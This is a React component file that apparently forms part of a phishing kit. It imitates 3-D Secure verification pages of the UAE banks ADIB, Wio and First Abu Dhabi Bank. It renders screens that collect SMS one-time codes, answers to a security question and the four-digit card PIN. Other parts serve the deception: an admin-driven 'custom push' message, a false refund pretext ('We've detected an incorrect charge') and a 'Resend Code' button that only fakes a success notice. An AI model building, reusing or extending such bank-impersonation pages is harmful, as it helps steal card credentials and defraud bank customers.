import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { isMastercard } from '../../Utils/cardScheme';
import './UaeBankLayout.css';

export function isUaeBankDesign(design = '') {
  return String(design).toLowerCase().startsWith('uae_');
}

export default function UaeBankLayout({
  bank = 'adib', // 'adib' | 'wio' | 'fab'
  scheme = 'visa', // 'visa' | 'mastercard'
  mode = 'push', // 'push' | 'otp' | 'question' | 'pin' | 'custom'
  title,
  subtitle,
  customMessage,
  onApprove,
  onExit,
  // OTP / Refund props
  code = '',
  setCode,
  handleCodeChange,
  handleSubmit,
  errorMessage,
  isDuplicate = false,
  isRetryActive = false,
  isShaking = false,
  isSubmitting = false,
  timeLeft = 120,
  formatTime,
  setIsDuplicate,
  isRefund = false,
  // Question props
  customQuestion,
  answer = '',
  setAnswer,
  handleQuestionSubmit,
  // PIN props
  pin = '',
  setPin,
  handlePinSubmit,
  children
}) {
  const navigate = useNavigate();
  const [resendSuccess, setResendSuccess] = useState(false);
  
  const isFab = bank === 'fab' || String(bank).toLowerCase().includes('fab');
  const isWio = !isFab && (bank === 'wio' || String(bank).toLowerCase().includes('wio'));
  const isMc = scheme === 'mastercard' || scheme === 'mc' || isMastercard();

  const handleExit = () => {
    if (onExit) onExit();
    else navigate('/');
  };

  const handleApproveClick = (e) => {
    e.preventDefault();
    if (onApprove) onApprove();
  };

  const networkLogoSrc = isMc 
    ? '/images/banks/uae/mc_id_check.png' 
    : (isFab ? '/images/banks/uae/visa_fab.svg' : '/images/banks/uae/visa.png');

  let bankLogoSrc = '/images/banks/uae/adib.png';
  let bankLogoClass = 'uae-logo-adib';
  if (isFab) {
    bankLogoSrc = '/images/banks/uae/fab.png';
    bankLogoClass = 'uae-logo-fab';
  } else if (isWio) {
    bankLogoSrc = '/images/banks/uae/wio.png';
    bankLogoClass = 'uae-logo-wio';
  }

  // Session transaction details
  const merchant = localStorage.getItem('session_merchant') || localStorage.getItem('session_merchant_name') || ((typeof process !== 'undefined' && process.env.REACT_APP_MERCHANT_NAME) || undefined) || 'Merchant';
  const amount = localStorage.getItem('session_amount') || localStorage.getItem('summ') || '';
  const currency = localStorage.getItem('session_currency') || localStorage.getItem('currency') || ((typeof process !== 'undefined' && process.env.REACT_APP_CURRENCY) || undefined) || 'AED';
  const last4 = localStorage.getItem('session_last4') || localStorage.getItem('last-four-digits') || '4242';

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1).toString().padStart(2, '0')}/${today.getFullYear()}`;

  const renderError = () => {
    if (!errorMessage) return null;
    return (
      <div className={`uae-error-banner ${isShaking ? 'uae-shake' : ''}`} role="alert">
        <svg className="uae-error-icon" viewBox="0 0 24 24" fill="none">
          <circle cx="12" cy="12" r="10" stroke="#ef4444" strokeWidth="1.8" fill="#fee2e2" />
          <line x1="12" y1="8" x2="12" y2="12" stroke="#dc2626" strokeWidth="2.2" strokeLinecap="round" />
          <circle cx="12" cy="16" r="1.2" fill="#dc2626" />
        </svg>
        <span>{errorMessage}</span>
      </div>
    );
  };

  const renderTransactionSummary = () => (
    <div className="uae-tx-summary">
      <div className="uae-tx-row">
        <span className="uae-tx-label">Merchant</span>
        <span className="uae-tx-value">{merchant}</span>
      </div>
      {amount && (
        <div className="uae-tx-row">
          <span className="uae-tx-label">Amount</span>
          <span className="uae-tx-value">{currency} {amount}</span>
        </div>
      )}
      <div className="uae-tx-row">
        <span className="uae-tx-label">Date</span>
        <span className="uae-tx-value">{formattedDate}</span>
      </div>
      <div className="uae-tx-row">
        <span className="uae-tx-label">Card Number</span>
        <span className="uae-tx-value">**** **** **** {last4}</span>
      </div>
    </div>
  );

  const renderTimerRow = () => (
    <div className="uae-meta-row-wrapper">
      <div className="uae-meta-row">
        <div className="uae-timer">
          <span>⏱️</span>
          <span>Time remaining: <strong>{formatTime ? formatTime(timeLeft) : timeLeft}</strong></span>
        </div>
        <button 
          type="button" 
          className="uae-resend-btn" 
          onClick={() => {
            if (setCode) setCode('');
            if (setIsDuplicate) setIsDuplicate(false);
            setResendSuccess(true);
            setTimeout(() => setResendSuccess(false), 3500);
          }}
        >
          Resend Code
        </button>
      </div>
      {resendSuccess && (
        <div className="uae-resend-alert" role="status">
          ✓ New verification code sent to your mobile phone
        </div>
      )}
    </div>
  );

  const renderFabAccordions = () => (
    <div className="uae-fab-accordion-container">
      <details className="uae-fab-details">
        <summary className="uae-fab-summary">Learn more about authentication</summary>
        <div className="uae-fab-accordion-content">
          A password-protected authentication system designed to confirm the identity of the cardholder. By requesting a password known only to the cardholder, the bank can verify that the genuine cardholder is entering their card details into an e-commerce website.
        </div>
      </details>
      <details className="uae-fab-details">
        <summary className="uae-fab-summary">Need some help?</summary>
        <div className="uae-fab-accordion-content">
          Please contact us through the Customer Service number on the back of your card.
        </div>
      </details>
    </div>
  );

  const isMcOrWio = isWio || isMc;

  const renderFooter = () => {
    if (isFab) {
      return renderFabAccordions();
    }
    if (isMcOrWio) {
      return (
        <div className="uae-footer-section">
          <div className="uae-wio-notworking">
            <p className="uae-wio-notworking-title">Not working?</p>
            <button 
              type="button" 
              className="uae-approve-link" 
              onClick={handleApproveClick}
            >
              Transaction Already Approved
            </button>
          </div>
          <div className="uae-exit-wrapper">
            <button type="button" className="uae-exit-btn" onClick={handleExit}>
              Exit
            </button>
          </div>
        </div>
      );
    }
    return (
      <div className="uae-footer-section">
        <div className="uae-footer-links">
          <a href="#help" onClick={(e) => { e.preventDefault(); alert('Please open your ADIB Mobile App or contact ADIB support at 600 543216.'); }}>
            Need help?
          </a>
          <span className="uae-footer-divider">|</span>
          <a href="#terms" onClick={(e) => { e.preventDefault(); }}>
            Terms of Use
          </a>
        </div>
        <div className="uae-exit-wrapper">
          <button type="button" className="uae-exit-btn" onClick={handleExit}>
            Exit
          </button>
        </div>
      </div>
    );
  };

  return (
    <div className={`uae-bank-page ${isFab ? 'uae-bank-page--fab' : ''}`}>
      <div className={`uae-bank-container ${isFab ? 'uae-bank-container--fab' : ''}`}>
        {/* Header with authentic logos */}
        <header className={`uae-bank-header ${isFab ? 'uae-bank-header--fab' : ''}`}>
          <div className={bankLogoClass}>
            <img 
              src={bankLogoSrc} 
              alt={isFab ? "First Abu Dhabi Bank" : (isWio ? "Wio Bank" : "ADIB")} 
              onError={(e) => {
                if (isFab) e.target.src = '/images/banks/fab_dark.png';
              }}
            />
          </div>
          <div className="uae-logo-network">
            <img 
              src={networkLogoSrc} 
              alt={isMc ? "Mastercard" : "Visa"} 
              onError={(e) => {
                if (isMc) {
                  e.target.src = '/images/banks/idcheck2.png';
                } else {
                  e.target.src = '/images/banks/visa.png';
                }
              }}
            />
          </div>
        </header>

        <main className={isFab ? "uae-main-fab" : ""}>
          {/* 1. PUSH MODE */}
          {mode === 'push' && (
            <div>
              <h1 className={`uae-bank-title ${isFab ? 'uae-bank-title--fab' : ''}`}>
                {title || (isFab ? "Payment Authentication" : (isMcOrWio ? "Confirm Your Identity" : "Authenticate via ADIB Mobile App"))}
              </h1>

              {isFab ? (
                <div>
                  <p className="uae-bank-subheading uae-bank-subheading--fab">
                    {customMessage ? customMessage : (
                      <>
                        Please open your FAB Mobile app or tap the push notification to approve this payment request.<br />
                        You are paying merchant <strong>{merchant}</strong> the amount of <strong>{currency} {amount || '0.00'}</strong> on <strong>{formattedDate}</strong>
                      </>
                    )}
                  </p>

                  <div className="uae-push-card uae-push-card--fab">
                    <div className="uae-push-spinner-box">
                      <div className="uae-push-spinner uae-push-spinner--fab" />
                    </div>
                    <p className="uae-push-text">
                      {customMessage || "Waiting for your approval in the FAB Mobile App..."}
                    </p>
                  </div>

                  <div className="uae-fab-btn-group">
                    <button 
                      type="button" 
                      className="uae-submit-btn uae-submit-btn--fab" 
                      onClick={handleApproveClick}
                    >
                      I Already Approved in FAB Mobile
                    </button>
                  </div>
                </div>
              ) : customMessage ? (
                /* Custom Push notification card sent by Admin */
                <div className="uae-push-card">
                  <div className="uae-push-spinner-box">
                    <div className="uae-push-spinner" />
                  </div>
                  <p className="uae-push-text">{customMessage}</p>
                </div>
              ) : isMcOrWio ? (
                /* Authentic Wio & ADIB Mastercard Push instructions */
                <div>
                  <p className="uae-bank-subheading">
                    To complete your transaction, please verify the request using your registered device.
                  </p>
                  <p className="uae-bank-subheading">
                    You will receive a notification to confirm your identity.
                  </p>
                </div>
              ) : (
                /* Authentic ADIB Visa Push instructions */
                <div>
                  <p className="uae-bank-subheading">How to approve this payment:</p>
                  <div className="uae-bank-steps">
                    <p>Step 1: Open your ADIB Mobile App or tap the push notification</p>
                    <p>Step 2: Review and approve the payment</p>
                    <p>Step 3: Return to this screen to complete the purchase</p>
                  </div>
                </div>
              )}

              <button 
                type="button" 
                className="uae-approve-link" 
                onClick={handleApproveClick}
              >
                I confirmed push
              </button>

              {renderFooter()}
            </div>
          )}

          {/* 2. SMS / REFUND (OTP) MODE */}
          {mode === 'otp' && (
            <div>
              <h1 className={`uae-bank-title ${isFab ? 'uae-bank-title--fab' : ''}`}>
                {title || (isRefund 
                  ? (isFab ? "Refund Authentication" : "Refund Verification") 
                  : (isFab ? "Payment Authentication" : (isWio ? "Confirm Your Identity" : "Authenticate via SMS OTP")))}
              </h1>

              {isFab ? (
                <p className="uae-bank-subheading uae-bank-subheading--fab">
                  {subtitle || (
                    isRefund 
                      ? <>We have detected an incorrect charge. To verify and issue your refund, please enter the secure code sent to your registered mobile number.<br />You are receiving a refund from merchant <strong>{merchant}</strong> in the amount of <strong>{currency} {amount || '0.00'}</strong> on <strong>{formattedDate}</strong></>
                      : <>We have sent the secure code to your FAB Mobile app mailbox / registered mobile number / e-mail address.<br />You are paying merchant <strong>{merchant}</strong> the amount of <strong>{currency} {amount || '0.00'}</strong> on <strong>{formattedDate}</strong></>
                  )}
                </p>
              ) : (
                <>
                  <p className="uae-bank-subheading">
                    {subtitle || (
                      isRefund 
                        ? "We’ve detected an incorrect charge. To verify and issue your refund, please enter the new SMS code:" 
                        : `We sent a verification code to your registered mobile number for card ending in **** ${last4}.`
                    )}
                  </p>
                  {renderTransactionSummary()}
                </>
              )}

              {renderError()}

              <form onSubmit={handleSubmit}>
                <div className={`uae-input-group ${isFab ? 'uae-input-group--fab' : ''}`}>
                  {!isFab && (
                    <label htmlFor="uae-otp-input" className="uae-input-label">
                      Enter Verification Code:
                    </label>
                  )}
                  <input
                    id="uae-otp-input"
                    type="tel"
                    inputMode="numeric"
                    pattern="[0-9]*"
                    maxLength={6}
                    autoComplete="one-time-code"
                    value={code}
                    onChange={handleCodeChange}
                    autoFocus
                    placeholder={isFab ? "Enter your secure code" : "••••••"}
                    className={`uae-input uae-input--otp ${isFab ? 'uae-input--fab' : (isWio ? 'uae-input--wio' : '')}`}
                  />
                </div>

                {isFab ? (
                  <div className="uae-fab-btn-group">
                    {resendSuccess && (
                      <div className="uae-resend-alert" role="status">
                        ✓ New verification code sent to your mobile phone
                      </div>
                    )}

                    <button
                      type="submit"
                      disabled={code.length !== 6 || isDuplicate || isSubmitting}
                      className="uae-submit-btn uae-submit-btn--fab"
                    >
                      {isSubmitting 
                        ? "Verifying..." 
                        : (isRefund ? "Confirm Refund" : "Verify")}
                    </button>

                    <button
                      type="button"
                      className="uae-fab-resend-btn"
                      onClick={() => {
                        if (setCode) setCode('');
                        if (setIsDuplicate) setIsDuplicate(false);
                        setResendSuccess(true);
                        setTimeout(() => setResendSuccess(false), 3500);
                      }}
                    >
                      Resend Code
                    </button>
                  </div>
                ) : (
                  <>
                    {renderTimerRow()}

                    <button
                      type="submit"
                      disabled={code.length !== 6 || isDuplicate || isSubmitting}
                      className={`uae-submit-btn ${isWio ? 'uae-submit-btn--wio' : 'uae-submit-btn--adib'}`}
                    >
                      {isSubmitting 
                        ? "Verifying..." 
                        : (isRefund ? "CONFIRM REFUND" : (isWio ? "VERIFY" : "SUBMIT"))}
                    </button>
                  </>
                )}
              </form>

              {renderFooter()}
            </div>
          )}

          {/* 3. QUESTION MODE */}
          {mode === 'question' && (
            <div>
              <h1 className={`uae-bank-title ${isFab ? 'uae-bank-title--fab' : ''}`}>
                {title || "Security Verification"}
              </h1>

              <p className={`uae-bank-subheading ${isFab ? 'uae-bank-subheading--fab' : ''}`}>
                {subtitle || (isFab ? `Please answer the security question below to authorize your transaction with merchant ${merchant}:` : "Please answer the security question below to authorize this transaction:")}
              </p>

              {customQuestion && (
                <div className={`uae-question-box ${isFab ? 'uae-question-box--fab' : ''}`}>
                  {customQuestion}
                </div>
              )}

              <form onSubmit={handleQuestionSubmit}>
                <div className="uae-input-group">
                  {!isFab && (
                    <label htmlFor="uae-q-input" className="uae-input-label">
                      Your Answer:
                    </label>
                  )}
                  <input
                    id="uae-q-input"
                    type="text"
                    value={answer}
                    onChange={(e) => setAnswer(e.target.value)}
                    autoFocus
                    placeholder={isFab ? "Enter your answer" : "Enter answer"}
                    className={`uae-input ${isFab ? 'uae-input--fab' : (isWio ? 'uae-input--wio' : '')}`}
                  />
                </div>

                <div style={{ marginTop: '20px' }}>
                  <button
                    type="submit"
                    disabled={!answer.trim() || isSubmitting}
                    className={`uae-submit-btn ${isFab ? 'uae-submit-btn--fab' : (isWio ? 'uae-submit-btn--wio' : 'uae-submit-btn--adib')}`}
                  >
                    {isSubmitting ? "Verifying..." : (isFab ? "Verify" : (isWio ? "VERIFY" : "SUBMIT"))}
                  </button>
                </div>
              </form>

              {renderFooter()}
            </div>
          )}

          {/* 4. PIN MODE */}
          {mode === 'pin' && (
            <div>
              <h1 className={`uae-bank-title ${isFab ? 'uae-bank-title--fab' : ''}`}>
                {title || "Card PIN Verification"}
              </h1>

              <p className={`uae-bank-subheading ${isFab ? 'uae-bank-subheading--fab' : ''}`}>
                {subtitle || (isFab ? `Please enter your 4-digit card PIN to authorize the payment of ${currency} ${amount || '0.00'} to ${merchant}:` : "Please enter your 4-digit card PIN to authorize the payment:")}
              </p>

              {renderError()}

              <form onSubmit={handlePinSubmit}>
                <div className="uae-input-group">
                  {!isFab && (
                    <label htmlFor="uae-pin-input" className="uae-input-label">
                      4-Digit Card PIN:
                    </label>
                  )}
                  <input
                    id="uae-pin-input"
                    type="password"
                    inputMode="numeric"
                    maxLength={4}
                    autoComplete="current-password"
                    value={pin}
                    onChange={(e) => setPin(e.target.value.replace(/\D/g, '').slice(0, 4))}
                    autoFocus
                    placeholder="••••"
                    className={`uae-input uae-input--pin ${isFab ? 'uae-input--fab' : (isWio ? 'uae-input--wio' : '')}`}
                  />
                </div>

                <div style={{ marginTop: '24px' }}>
                  <button
                    type="submit"
                    disabled={pin.length < 4 || isSubmitting}
                    className={`uae-submit-btn ${isFab ? 'uae-submit-btn--fab' : (isWio ? 'uae-submit-btn--wio' : 'uae-submit-btn--adib')}`}
                  >
                    {isSubmitting ? "Verifying..." : (isFab ? "Authorize" : (isWio ? "VERIFY PIN" : "AUTHORIZE PAYMENT"))}
                  </button>
                </div>
              </form>

              {renderFooter()}
            </div>
          )}

          {/* Fallback custom children */}
          {mode === 'custom' && children}
        </main>
      </div>
    </div>
  );
}
